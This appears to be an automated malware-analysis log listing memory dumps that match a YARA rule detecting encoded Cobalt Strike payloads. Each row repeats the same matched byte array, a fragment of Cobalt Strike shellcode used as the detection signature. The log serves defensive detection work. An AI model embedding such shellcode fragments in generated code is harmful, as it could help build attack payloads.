00000019.00000003.499654163.0000000006E77000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x10a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500392333.0000000006DE5000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xed0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500656702.0000000006C3A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x9d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x39c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x69c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x99c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc9d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf9d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x129f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15a08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18a20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ba38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ea60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21a88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24ab0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27ad8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ab00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2db38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30b70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33ba8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x36bf0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x39c38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3cc90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500133947.0000000006E21000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2398:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507760692.0000000005EF2000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1410:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3368:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x52d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7238:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x91a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb108:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd070:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xefe8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10f60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12ed8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14e50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16dc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18d40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1acb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cc40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ebc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20b50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22ad8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24a60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x269f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28990:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499706418.0000000006E6E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x350:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.504345055.000000000656C000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1670:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3eb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6700:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8f48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb7a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdff8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10850:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x130a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15910:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18178:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a9e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d248:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1fac0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22338:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24bb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27428:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29cb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c538:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2edc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31648:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33ed0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499750187.0000000006E67000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xaa0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499521324.0000000006E8E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x10a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508543817.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x770:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.501697332.0000000006A21000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1890:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4648:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7400:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa1b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcf70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfd28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12ae0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15898:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18660:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b428:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e1f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20fb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23d80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26b58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29930:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c708:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2f4e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x322b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x35090:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x37e78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3ac60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.501200856.0000000006C04000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xf10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3e88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6e10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9da8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcd40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfcd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12c80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15c28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18bd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1bb88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1eb50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21b18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24ae0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27aa8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2aa70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2da38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30a10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x339e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509127714.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xf38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2970:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x43a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5de0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7828:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9270:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xacb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc700:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe148:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfb90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x115d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13030:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14a88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x164e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17f38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x199a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b408:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ce70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e8d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20340:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21db8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500032754.0000000006E31000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2770:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.567918240.0000000006071000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x6e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.502899282.0000000006741000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1780:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4228:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6cd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9778:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc220:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xecd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11790:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14248:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16d00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x197c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c290:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ed58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21820:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x242f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26dd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x298a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c380:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ee58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31930:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34418:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x36f00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.503663386.0000000006640000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1418:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3d80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x66e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9050:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb9b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe320:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10c88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13600:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15f78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x188f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b268:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1dbe0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20568:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22ef0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25878:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28200:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ab88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d520:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2feb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x32850:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x351e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500236769.0000000006E0B000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1920:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507414149.0000000006071000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x6e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509264079.0000000005B78000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2298:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3c50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5618:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6fe0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x89a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa370:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbd38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd700:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf0d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10ab0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12488:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13e60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15838:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17210:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18bf8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a5e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1bfc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d9b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f398:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20d80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507996577.0000000005E41000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xfc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2e18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4c70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6ac8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8920:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa788:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc5f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe458:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x102c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12128:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13f90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15df8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17c70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19ae8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b960:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d7d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f650:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x214d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23360:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x251e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27070:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499506056.0000000006E91000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1558:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508112663.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xfc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2de8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4c10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6a38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8860:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa688:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc4b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe2e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10120:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11f58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13d90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15bc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17a00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19848:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b690:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d4d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f320:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21168:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499764114.0000000006E64000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x658:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500280490.0000000006DFE000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1ab0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
